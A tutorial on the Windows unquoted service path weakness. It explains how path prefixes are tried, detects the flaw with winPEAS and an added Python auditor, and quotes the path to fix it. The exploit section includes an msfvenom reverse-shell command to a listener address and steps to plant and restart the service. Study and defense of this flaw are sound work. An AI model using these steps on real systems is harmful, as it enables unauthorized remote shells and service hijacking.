8 - Unquoted Service Path


Unquoted Service Path Vulnerability

The unquoted service path vulnerability arises when a Windows service's binary path (the ImagePath value in its configuration) contains spaces but is not wrapped in double quotes. Windows then resolves the executable through a fixed sequence of candidate paths, and an attacker who can write to one of the directories along that path can get a binary of their own started instead of the real service.

When the Service Control Manager starts a service, it passes the configured binary path to the process-creation API as it is stored. If the path contains spaces and is unquoted, the system tries each space-delimited prefix as a possible executable name before it reaches the full path, so a file at one of those earlier locations is executed instead of the intended binary.

Example Service Configuration

SERVICE_NAME: SimpleService
    BINARY_PATH_NAME: C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe

If the above path is unquoted, Windows will attempt to execute the following binaries in this order:

  1. C:\Users\Quickemu\Downloads\Example.exe

  2. C:\Users\Quickemu\Downloads\Example Directory\Another.exe

  3. C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe

Attack Scenario

An attacker with write access to any of the intermediate directories can plant a binary named to match an earlier candidate, for example C:\Users\Quickemu\Downloads\Example.exe. When the service starts, Windows will execute that file instead of the intended service binary.


Exploiting Unquoted Service Paths

Exploit Steps

  1. Identify the vulnerable service. View the service configuration:

    sc.exe qc SimpleService

  2. Create a malicious binary. Generate a reverse shell binary:

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

  3. Place the malicious binary at the first candidate path (the first path in the search order listed above):

    move malicious.exe "C:\Users\Quickemu\Downloads\Example.exe"

  4. Restart the service:

    sc.exe stop SimpleService
    sc.exe start SimpleService

When the service restarts, Windows will execute Example.exe instead of simpleService.exe, effectively hijacking the service.


Additional Examples

Example 1

For the binary path:

C:\Program Files (x86)\Company\Company App\App.exe

The following binaries will be checked in order:

  1. C:\Program.exe

  2. C:\Program Files.exe

  3. C:\Program Files (x86)\Company\Company.exe

  4. C:\Program Files (x86)\Company\Company App\App.exe

Example 2

For the binary path:

C:\Program\Cool Company\Cool Binary.exe

The following binaries will be checked in order:

  1. C:\Program\Cool.exe

  2. C:\Program\Cool Company\Cool.exe

  3. C:\Program\Cool Company\Cool Binary.exe
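The following Python is an added example, not code from the original page: it reproduces the candidate search order shown in the examples above for any service path, flags the services whose path is hijackable, and emits the sc.exe fix used later on this page. It generalizes slightly beyond the page by applying the CreateProcess rule that ".exe" is appended only when a prefix has no extension, and by treating a double-quoted path as having a single candidate. It assumes the ImagePath holds only the executable path with no trailing arguments; the service names and the two extra paths in the sample configuration are constructed.

```python
from __future__ import annotations

def candidate_paths(image_path: str) -> list[str]:
    """Executables Windows tries, in order, for a service ImagePath.
    A double-quoted path has one candidate. For an unquoted path every space
    may end the file name, so each prefix is tried first, with ".exe" appended
    when that prefix has no extension (CreateProcess rule)."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        closing = image_path.find('"', 1)
        return [image_path[1:closing] if closing != -1 else image_path[1:]]
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        last_component = prefix.rsplit("\\", 1)[-1]
        candidates.append(prefix if "." in last_component else prefix + ".exe")
    candidates.append(image_path)  # the legitimate binary is tried last
    return candidates

def hijack_candidates(image_path: str) -> list[str]:
    """Every candidate except the final, legitimate one: a file planted at
    any of these paths would be started instead of the real service binary."""
    return candidate_paths(image_path)[:-1]

def audit_services(services: dict[str, str]) -> dict[str, list[str]]:
    """Service name -> hijack candidates; quoted or space-free paths yield
    no candidates and are therefore left out."""
    return {name: hijack_candidates(path) for name, path in services.items()
            if hijack_candidates(path)}

def sc_fix_command(service_name: str, image_path: str) -> str:
    """The sc.exe command that rewrites the path with quotes. Note the
    mandatory space after 'binpath=' and the escaped inner quotes."""
    unquoted = image_path.strip().strip('"')
    return f'sc.exe config {service_name} binpath= "\\"{unquoted}\\""'

# Constructed sample configuration; the unquoted paths are this page's examples.
SAMPLE_SERVICES = {
    "SimpleService": r"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe",
    "CompanyApp": r"C:\Program Files (x86)\Company\Company App\App.exe",
    "CoolBinary": r"C:\Program\Cool Company\Cool Binary.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor\svc.exe"',
    "NoSpaces": r"C:\Windows\System32\svchost.exe",
}

if __name__ == "__main__":
    for name, paths in audit_services(SAMPLE_SERVICES).items():
        print(name, "->", paths, "| fix:", sc_fix_command(name, SAMPLE_SERVICES[name]))
```

Running it lists only SimpleService, CompanyApp and CoolBinary, each with the same hijackable candidates the examples above enumerate by hand.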


Enumeration of Unquoted Service Paths

Using winPEAS

winPEAS can identify unquoted service paths.

.\winPEAS.exe quiet servicesinfo

Example Output

Look for the following indicators in the output:

SimpleService(SimpleService)[C:\Users\Quickemu\Downloads\Example Directory\Another\simpleService.exe]
No quotes and Space detected
File Permissions: Quickemu [AllAccess]
Possible DLL Hijacking in binary folder: C:\Users\Quickemu\Downloads\Example Directory (Quickemu [AllAccess])

Fixing the Vulnerability

Fix Using RegEdit

  1. Open the Registry Editor (regedit.exe).

  2. Navigate to:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SimpleService
  3. Locate the ImagePath value and add double quotes around the binary path:

    "C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe"

Fix Using sc.exe

Use the sc.exe command to update the service path with quotes. Note that sc.exe requires a space after binpath=, and the inner quotes are escaped so that they are stored as part of the path:

sc.exe config SimpleService binpath= "\"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe\""

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!